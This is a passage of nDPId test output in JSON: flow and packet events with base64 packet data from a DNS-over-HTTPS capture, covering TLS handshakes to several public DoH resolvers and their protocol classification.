qsbORFpVub7e\/4DvFTpQM4hnCin1UEw=="} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":946739385124,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3170,"pkt_l4_len":3136,"thread_ts_msec":946739385124,"pkt":"ZmZmZmZmRERERERECABFAAxUg1ZAADcGk2KIkNeeCgAAAQG7y9B6n3oh9zs+ilAYAO0tMgAAFgMDAHoCAAB2AwNC32Ly6HNyagXW\/50d2q6qJAOmShuP86HMxipBKzBmwCB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOBMCAAAuACsAAgMEADMAJAAdACBiVzglBWvQOWIt\/inusfkCbeAeDbm6AiXUcYUQ0SeUdBQDAwABARcDAwAgVY3jrnTrJkAawm+Mv8gBTn6zfdywiZ3PkfSROpmIxNoXAwMKFapXpMK700YralL2NJ+2AqPfCUAacni3qdcZUnufsXl31+F2NSHowZS8bEZc4wYIOhESfjBH81NgZUBCJL0cGqDMG7c\/GafBLHylsDncbVfIqhYnumIxgnBjMekzN4Jr3Pc5g1dWYk4XIPvLeMa1AeLFQqOY+unh1DHuo4FV4KfjYjnh7ERuvhffEbloWyMHFdAQi8p2J65FwIVJHxtFX6hmaEMmHATlFHHOx1RIGQmbmA5r5k0vgPGiuUMBe1e8Ay6+kNyhTTutV32hMuU4\/4gl06pCrT6iDU4Fx4eNT+Bo6E12QIKo042tC7Wn8Kl\/KILiC4TaY1uTO0+LE4wVqs5DJHWwykde\/Mpu9moeLZ0VhV6Rnx2ocHW4rczn9gPX5qTiTrDgHO7CKCVp0Yo86Aw2suyeRkNR6Pz2DTuex3RC6JD+6hKlKYjQfx6kO1r8jKEZ8UZCGU+Rw2Pd2IT\/whiiT5Kf7zLPm28Fu5xYAFYob+TbRXBcQ0z8XUJIWzCMQvkjyj\/EBbyfhm8Iz194guweTL19Y3Q2XO+NnAUm9ihjSHpRimJ0Ale\/24shK7Q0gI7NtX4Sy93vR61pN+Zbul9p4+Mos8cFPIfYJPR5DmxNv9L\/cWnYOwtiE8KnRSAYR+6q3d\/0S6rIgkskZa1GGNAffeDtgnD5SVrh+YhdzCWZCb6834ULGghfWcw8DVqJTSeWttzs5JvcUzLfaxv2WQHaWCXuUpmCZy6HgKkW3jxYYWr2tyqizXXXq732dtVhz4LWmL9EHS1WzONzEhrNFQDtpAQ95k9MRPEdXjg0bNse0lpUI4AUqhIkxWgs0j+8YRzV3BBFFrpEwA3Ylhpo+Wbg8IG0hFyThCaHTvj0vN5WKh94GQCSIjO11AtJoS9k0tl5NWJ7dp2n0NCYI25hp41FivaF\/BBZqFxHTd\/4w8k1KmIQOky6ICw7WRykbaqxzUboD5Bq7peIuOsiwZoUMD+BDbF\/3fE\/CVHWoaOcr09A0PaL0PLhUDjARYyrR4LsVfpqkH4CZh+5Jr1aOIJ+zgcH7Gme4o7fpj5Ml+hu\/y+kOOZZN5J0XdtmvZE5w20Osrk+W9YsiLIeYNt9SB2i7LEsIRfsOrVhh9XsJ8\/VF+0Pp0BTxOsC+9Ft0\/Qj6hgm17CCVsOwdD0VhkUWaus1O+o2PGnC8v4FL3kFyyqT6BtubEcffH1AbvnEid+VZXXjMTJvMB6eWAs+UqpOrNnkCEZAK35TZ0tRUT\/0MJ65M3rSS8cnt+LL4apIWh9CenPODN35ZvH8b3XA1lwJHej3o7w4KZBEvRoLt8OxNNvwpgMfHbFpXZIqbODt95v1PnTJxwC\/vTEturbRIFjRNgt+KCX3zfwvULi6DBxiqBmChwECudELdgYVXSzaQF56hOrspt7m7cSP\/bSuhLgvGoeM7hRIXBgEFXWWobiqWKLPkIiUnd3zKygePoMYOZHF1u2D1V4jxKHpRJ6c0k9v9f8PV1\/2cqY\/66gHBBbRV41oC7rjWm5aIoPFQPYH0PovphDScGBnJ6jwAMRZhEh8stnUD5D9slPJ\/emP0c\/PTpb6PEHZyu0Q7qMTKM1bbEpBCcvYFzyVsCvmHuicyOKAs3xMxmCmWm4Eqf7griGXbNKYrhS8laSwuwkSEnXVtwhIr1b+a3aGOTQNdzJzZMKbJeIH1FS5VDDqACuwzlpn2\/PpEcmP5h\/q7H0tPqDs+gUGEHDMancSkknkDjnO8AWIHrv7XSmAw8MzBpM2IwCdCuY2dZXBowy6lZV\/inUY7ZvvXtbP6a8QnD\/\/IUygRpu63NQLm4VeKCFEprpn1cgwz5cL4vjrW8z1Oy+wINHvxXqkotg8FbTmtoSQdi7m2\/uaxkwXGvCE+Ey\/VyskJtt+1lkVPt6gqRb1ZVRQm9DD0JoMxHNgFOAaDrB+WFlvX4dGQvQzwATgRC8IKAuMZ8oKSe0p8HpA+6MvWjcmzVE8kVy6HlIQ+H75lU+B2jVUeDC7BKjayT8YnFAN9VHJiYBcwsc6cBByDnSSlpjY95o1fVD\/OvMoqArUx2Avc07VIGr\/MqkoiuFsBZpt7HMy13Sks4rLBRM4blbz1tgnQW4V9XKGhwXXv\/r\/C7JzoFDKo1O5LL2d9NrS47Pk6pIUPyJaZQjYfdcqsgSPEYWloR+Ff71Pv2pzjT7Sxhw7YViV\/havSqMuVAeVNrx2FMlZ7\/Bjxt5t67OkjvVTbouDt\/zCvvPnjRGuWwfp0n7UEFUPBk0VQxxGTP46k14fFISL3DGCnaRmvSrBlk9oDA6joQ7sLe2wbd3yp\/7JTFG1yDws5hd9oSrDxTaFhT45Qw3wjaIXqpHrDVkIJVV3fSH3u051VvqUmuXNvgcA8QfJRF+xOWpwuJtANd+GaqvaC+iETLzkP5VxYMxDGAjzMI0o+7huhk06Ls+Jf4doAnMQ5xvzlXN0Jrm+66K6cwpPwq24uT0WBbVDSG8a63HdMk9Pitugm8gT5TfsMmkXcm8XvYm1EpxDTSUVXFdXoLfWyXIhhuACKArB7XcNbTOuzKmBQBNDeLFYB1E9Xt4xRs2cOc5M8BTSXsHSPQTYdc21dTZiVfSAP6\/2Gshg6m4bugupSvk5LVq6A3lh9ffmzYt3Db3zvnfSy\/Tt0BCYi48I1IzHC+nCbjFn40UDUHc5XrNCkmhQS1xNJg2qHFTjjUPePEW4+j3bBQRUYXBtmXyjbe7imkVYxn1jKZ8UW4USSgX9QTTgWMboFPNKvAGle0s4p63tKesbx5ZYZnXD1JMoq2wiuX3opjO2N0ancv\/RxoLDDssEhCe9dO3easTHhI9ARvh9rKZYKF6v6Kl1ISp1JmJSDWM7inua1o+4o1SDMyo05cBVGhhMTS\/9p3uBa3Q1+zink\/HkPt7+J8Qdeq8lFck+4f63IssnVRJTPYYtIlJvBDnEIzxlrIFjJvmSNN4lcsRZJPOIHxFfXw8TJRTgsvPxtdi3tSQFm4F+2sukCmWqPEy6giI87MQfoD2C\/Yj2M+9KXDCNq9W6tv2b4CTjfHZU+XTLbVYONSXTzAYgn5lkwz08bD2gqCs44qF\/KSJheO2v6XSQicbKpwE887mn21\/pZ1Aw7fFPdQKOSr+ozmKo3Hb7k8xRc9xS+jbMArySJEwlivY0HatI+S+fkF+iQUSFVepgBMwShL52IjMRPaDyXtnlg9nE04NDcI9V\/O40c8DJA21O6zuYXUndYIEnkJP\/UZOqiU4vEYGHHSxvu9z+OTP3HTmjMdAhSyUL1oGolZq+yT9EbInHY55rq655Oq72NwpUp+JpPgCJKsED+NjtqOZ3sxznqDpY1ghAohk4yNRdPDZzbaGgQemzPXCmXrFUsJTwcXd\/xU2NomnNTP3pmszYNUkgCR3tnkTvld9wZ\/IPs3fkgYPdntgi8PuMGjCH6ME+NhxjtV2MwDTodlIXAwMBGU0t8RnrdJi\/j1+SnvZYpC3oLybUZ0YAwC7FNMEEzD3PWZ1mQcdYkqPO6V4n6ARpcK+AxFYr2ZmYp5VZ6aP4ufUuA8CpPBGwUlNcZ3M2nwocOtccZ2oJCl6+gngVMfWFCnvPyKdJAIVEiwSYCs+M06T9K8Dn7IVtMoEfwHeIvTYluO2bnPQHkZLgVvtx4CODgchK9krbewpUgSyVMOqarNN5yC6WFzhdNiofu8YhqHlXXyYNaQehlZN2BSM6BAq9rstGdYvwLr32NuZBk40ppHqXSd1NL8zbf+k8yuXVg+g2tFIIoJcrHKG\/jMtPDHaZoxXSW0XP9QnmktFPm2sVrC8auYwtvIIcyHfmG4LUFWv9oOl2RWB0AiDdFwMDAEX95TGyYknbRQv3FxTdx\/ySOpsXyo9B3C1mQe9wKL+RuBQiooWFUmPWbB6tbYWNx9OjEFACLxCx4a2G5wYexWMh\/ScbEd4="} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385090,"flow_last_seen":946739385124,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3402,"flow_avg_l4_payload_len":1701,"midstream":1,"thread_ts_msec":946739385124,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":946739385126,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739385126,"pkt":"REREREREZmZmZmZmCABFAAB4rgNAAH4GLZEKAAABiJDXnsvQAbv3Oz6Kep+GTVAYAfUhVgAAFAMDAAEBFwMDAEXEY3mnjR52mKqLxIMUmRZZcXFLr4uTi7u4xG7UfhN8KpUlgxkvImJLngXBZJdhlsdOO80qBVROy\/zQG1hjQj9e57h2KPE="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":946739385216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739385216,"pkt":"REREREREZmZmZmZmCABFAAFDj7xAAH4GQrYKAAABaBwAapkuAbuxqh8KTGGTY1AYAfYqeAAAFgMBARYBAAESAwMGpOiD7bGSBZJpQPwx8jjTz98dXRQiG2dJooZruAvSbiD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmNyeXB0by5zeAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACCocx\/g1t9BSq0aHoBq6EokYegQUNndj200eG6GOsFbfA=="} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02429{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":946739385246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAAXU\/OxAADcGF\/VoHABqCgAAAQG7mS5MYZNjsaogJVAQAEIzqQAAFgMDAHoCAAB2AwOeWrg8chGRKGTlO6HJ1p62TG+C+NnG3SsfyKZ3JDWszSD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoBMBAAAuADMAJAAdACBCHrrBrdBjTxY914LUzlqx\/FQ6u0oPg+tIKo8Yp0xoIwArAAIDBBQDAwABARcDAwk65sXHo5FyUtAiAM03V5kAW3+LXGLR2yplHW327Ar7lBVn+cWyqRXyVDveXS6Tg0vk7DEhWyy4Lki1hEqLM5o32Zp445RQDsbrctFBNFcOMJmryYHv6cTI1ALBX4o3m7ShqxgiNr648SOfRyoVsKr13ok5Co8m3yWWjvTT7U22a\/V25Yf1TTU5ZX3C3nLhUlp8F4S6K70cvraldnw\/uD6FRUq1lAFYY+RdFtBona62R3kW3zAEmLHlxjwypAF3Ed8HpEUN3N6Hh8WR8FPduTTrU1rGJcfthDCSePngGTmyI7kai\/r2bxnw0X75rGWPasNSz\/szhNdRWEo0KOZIuIIBBW21rDG1KEO\/5TMjvtncyk4jgN5jajgEgs3G7B7IN47mqI9K2FWa09ZHw5D9ghGF6WusPDND4+h9gRzFYMTRQAs+YDOQfRoqmeDcHvQas+1JnEYjeG1g+nCoph2J1xKskq4pSu\/4\/GnANXkQNNVNHjjq8pJ5wm6ibeZE1gq6PVr0nZRMBq7E5\/av8PC0+acRxKixaAa33wWyU6SeZcL1kZkunKDWXWcdvdQy51Xenyz43fec7O\/+7mHHRsySVytdXjgD0ZKChXJn+AmwQrC7OY5cEE84MSyXQywUeiGMZz6HP3Gxw+6pQWrQZTjvM2lPibOGlOclGV30N96QQ95Wm7tUJbwgXYzy1Ap3e6BhUMIyFcI9\/pMzhGjOExmlzyT6BDYONbNyjHW2odTpZ8WjTWXt5ItMp4Qf4ciPCegZXwYLxQYwEVRpcpQCUbjq9DqojYcETIPE8pYwv+pEogBkJ36XO7ISaByslei0uwlMTDGqahxFUG9xNqF2N+uBuGm3rP1N0De6EH72L31wAMHQLr+g\/Z6vH8L0t5ZBiVyHRYWFiBaqBS7sS5CL7XIwxWU5nT4+O0vg9\/RKsE8R\/V3oTcaEyuOxZPN2ld4OexQ1VlWcqVQyk2Twbmq7OKKuOtMkJEEelQzBbVDHxrvHpN4rIHzn\/9TLkc3K+Gw0IKsO0YEfzDLQOy1LPBOrUtSvkHpTT\/9tKCeQ5oeaxAcdxjrW8Ob6O3OfTjPur4i7Dr1vbtCqdprUT3YFFMRDZ26nuYQwhC4uKvrLCR3YBND9okLFnTd\/lUt6yGc2upOIbcXBXCyaL3ONPVCFw2rLhSE+P67Rrx0pQ\/PN3BUeVHTUY5OZL2UVofmKcp3kyCsJpqyPvgqtN6sEvjlAvawn31gSxqPJMO+J4TEIN4NsQHeQPoQbqZEwJ5dggsoNl6xy1PlfH8FxBn\/\/\/Lr2eBnvYK65olzMCuvQ8qYuGMLDeKU+eAivsl062ELuv+\/dM8uhg7Eno5vDfDKFHEJLzWRw5E8iFnEoRLS95ap\/irULTPgAA0QmZ5jn1YuEDktj\/0IeFc53AUQ0iqNqf8q3TqQngAAZUKBI7Sk44RP395w1L0Eyzfl4IxdNlReV035GNhrN\/DGIe5cd9OmCUDwyYWDZ5z1ksNzw8W+uzpiwBt55f0ZJkvLbFgiMA+gkUt4hT8f5WK5dSjcjsu1hL60eqoQvBa0lWD42dAL0xAVrNk06unSiy5OJX2WBK7Q7No9ybhYFoGzDI8ZzAHGp1Xz2h+but\/3A\/uToYXT+zhFlUes\/MlMz6r15CtQUfWQhXV2DbcqYzcNr7XtwvhWwQRBQjoyEwldiUNrV4kfA5BNVrLK+IAb34EZEEXlsaVEYZdfTSkwf5mFzUW8YEGENVFtWYgvqKiwzQRm4Hnu9"} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385216,"flow_last_seen":946739385246,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1735,"flow_avg_l4_payload_len":867,"midstream":1,"thread_ts_msec":946739385246,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":946739385246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1102,"pkt_l4_len":1068,"thread_ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAARA\/O1AADcGGYhoHABqCgAAAQG7mS5MYZkPsaogJVAYAEL3vQAAj+eEnaAC9OtjNn9ZDhuY0QkIU8Et3SozIjmeFN3jl5ynvaSd0TNRCmKpUZKf\/fvqVCNBLPVpc+a1\/34xSlEnpJggvfLX55X87U+wFE+Gr7WzyudHjYSOPmOcexDC2hRAzeXYq1TgqVwJwEh4MCpq5hwfPH3wEyqIpcTyPqNEKua3iGoGl0jDllgnOyDy6qMtoHeGHyOqCPa7ViWWNsuvANnFYfP4DWXgq8fcNnwinGDW24misysy6Sky1Qfcgf01K751PVkPm8BzlnUWtr7bdFh8y4G4SaM7Ac3Zldy8pQDT1EbhFcuRGdsZ0naorgHPYs0SmR0Y3t6UYCsF0YOkjsdAEbpFIfyrBCBlh4z7aJh9xKrg\/5jQsdBuWbO9f+feot414m65BkfEsJNZt6q0OhiZBadbjN3fS3WVyRW59gC6+MXzyIF5Wxx4OnO6rWDTIiTViNpHvl70VUj6EIp7jtN+701iQ9XIbvLRRNs1dMLQv4llg0va54eLOiI8Tefj84dHZQatLYpsLcK1X1xgMBQvJdmlFwbKncCrUOCkGSrsZ4LVBWhcaxKoO36xnPPDV8cinSkrG\/rQoYT4tiAfTIWSqbjcWcgucf0EZWFYbi9MDrGUzUcZr82zbUhnYlEj1+aY2lv2lSt5AqGSaUKeQRwioCypPc3dHt1C72aRiX4CCSBeRj4DN2l\/vJTlcaPiDNg7t6TPWllts+Co\/OdFgVAkJAl+HIZBjiQtPGdBZH0Q8WHs19m6ieXdVdu3SXksmcJ4OArDrkVebghoJZJUEvtdYdAu0CxG32Y7Bdxe9zNMbKMIjUZThhjnA7hE+UoUNNr4aUW73torTPDm\/PasISFjUH1CHoDvjfn0IYzqO2vVaat\/SFbmMFs6UfAByhfgtTIBdM4vlalC4vJ\/3gPNzVh1u1xqYYIU6wN60WQoEexxjHdAMBBR1w+y4czMCbyPxsYOQzTZedkx2ofb\/xA+Z+8rEmaj0xb8Fyln6Nq8bsbjlAzp8F+BPhhygJC1D1SpxfIjpLhJ5pR8cCPnmFuv4Wb6pCT3F\/xJW7qpcmMvdn7rOqlw0sLhKBRfOeheFxSJrKe9iavOuolDEItae4jRrh8cRuAabSIDs\/KL9d4qTkbOnc6ryMLcKUz4QDjr3QIMIHJiOX9+2DVL5+3CGc336xPBx67NPWns3pKxWZovEglaPedBeKa1Ay9zwVrpcshhz8ZViqEZyeGf3Bhnr9gYf6a2k+91KFhxPRsj3wr6DG1ZrNf\/1DpWp8C8Eic8yqmZ7eLKXZwe+Mz2GUUCbxCXRoPG9q7XWM+v0cWz5lxW0nXaPM0vHHCL7Iqhc5wjeX5d9z5lx39pQN3jzFWZB4SuiTobndYtfC9FvqzivwC8uagzgYQI8AhesQ=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":946739389936,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739389936,"pkt":"REREREREZmZmZmZmCABFAAFBc1lAAH4GKTYKAAABLUxxH8s8IPtar+ZR\/RI3kFAYAfZgWwAAFgMBARQBAAEQAwPDKTE3gtHe4YkRucyB7lgiewe8eRdkAeXi8xQ\/UXf8siCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALZG9oLnNlYnkuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgBTSef\/+Gs9funZgaOAKPCcHz5qP34E4cKsNkKCajyxU="} -01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739389936,"flow_last_seen":946739389936,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739389936,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02376{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":946739390265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z1AAC8G9+gtTHEfCgAAASD7yzz9EjeQWq\/nalAQAfntdQAAFgMDAHoCAAB2AwOTWCXgGAu71\/Yvi6NLTHUrXueot2ESWHeiaJfdHE5RUSCUJYNjNKAcmo3iKZ+yKMitYiljKY339PIqZtuOYBZE7BMBAAAuACsAAgMEADMAJAAdACDWWloo6cinLldR+cnVD8kRD\/l0Q2+aXf\/fBY+S+WSMRRQDAwABARcDAwAkRhOnfgeD\/nNOoyXIFtppA82CTRb9QELrjIuZ4Sms6\/A\/wFXWFwMDDR5COUoGySb4hNNJ9UU6WNVu5EkkD6YuaPuXJ8CsVpFNJmnkrUN+8qnnRcWKvhiCSeJ8dFamc6FJiqYTi+y4vhj\/9CUzXrDpoIqCPPPJVzrO7TRKenUWLYob8NzsM\/dFIXxOJTiZrwtOg0PRbjHk1oNiocDmQfIuK+9XQjJXpmH6WXi1GuKS6BI\/Mhq7VeFosQzd4f6PedlOLyqUiLqOkZBu8shjDKqJBgT+asclbYKMS0So4WatuM12p1csrxpvTCnaj0btgSWvRlOtA5V89mkHs0RlWfRzITmJodp36A7TpRfkiq+5ADaJkK4PCqzM7n58+S7faojcjUVNv3TZMKR9X7THNbnF4RYlkXi+yQzERvi6AVU4qjl1T3oshQYm+0uXk6wZy\/EHFkS0kI4JdkMrhx\/QDyFE9JrZnCDaKSbgnVDXGxQ6JI3KX68rAnXlo16wEjgmYiB\/CpDOACPBUUmkRPrMxrIYGRVY5m4VHDtxxsBR+4pWd57JVtTXFf0dDyH1zJz6Z40Wrwh\/p6Qz5d2q3mQqk2qU0E2kn8++EZD8541s2A3AenqtWVuRk32zNIyJfY0yQnjyuK0juMCVOEjM4+TSdiFJcZE3rzM52S9F4fUWq+Qa6izwHy+3rJUcjKQaK3KU1ecorGHjAhe9fanpg8OhUEfZK30POLsPc9a0KJ8Bhzb\/xTp4iMokguZqwGUeiTSNyWJBScTyI9LLhhKpNOWbmn0FCwxaV5Mbt+mvTDDVs8cw9GaOZN49PQe6J7UFtKhXp+jLkt\/igfMPvVErRgHNbDWAx05yKKN5cVgAGz+obL+4ZX79sXQRNBQfrfR7W7COyUVVMPxrdFItZFJXlJ2qtiFtfv22UGoflFY2zoiK9sk9Zj+K1u+9Vmzjs+RITpDecu73geffdixXjb3urBW4FykkW7oiu0nkWHDQgL+KviHt9Tm0lU0Hzsi8YTo4OdVu\/QwCcmn\/9YMQoYmxguinCV0SqsmSoXYPpWKAlUH8vnANpkvHS7OU72AWRuphcFRa4RXp48xd9rXEW7d6pcKpL7UD\/qAcfrqs3Aq3OBcZjm\/9+CZ\/HA+ws2AIqrw+2oY4SiSGn\/cjxInZ1S7KChZFleUsKWilMt0S80n1UHIe0ozJo1YpV6O+256ILtDlEXLc4L\/\/W\/Y\/61lq\/\/f9IHao9y20WHTGbxQOKX1rXuMjgZIEMZvVKqcKW+vUa6jVq0bpPfVryu2fyy6bH4O8lkPOuhDeO5FxfnatEMjgu7F6t\/PeACLHie\/Eg2ezTBDOdT85sb1vFD3nB3c3wl9xSQGoUXMREa3dlU4yyKTsRvhF5IVHX+WZrnZEXNI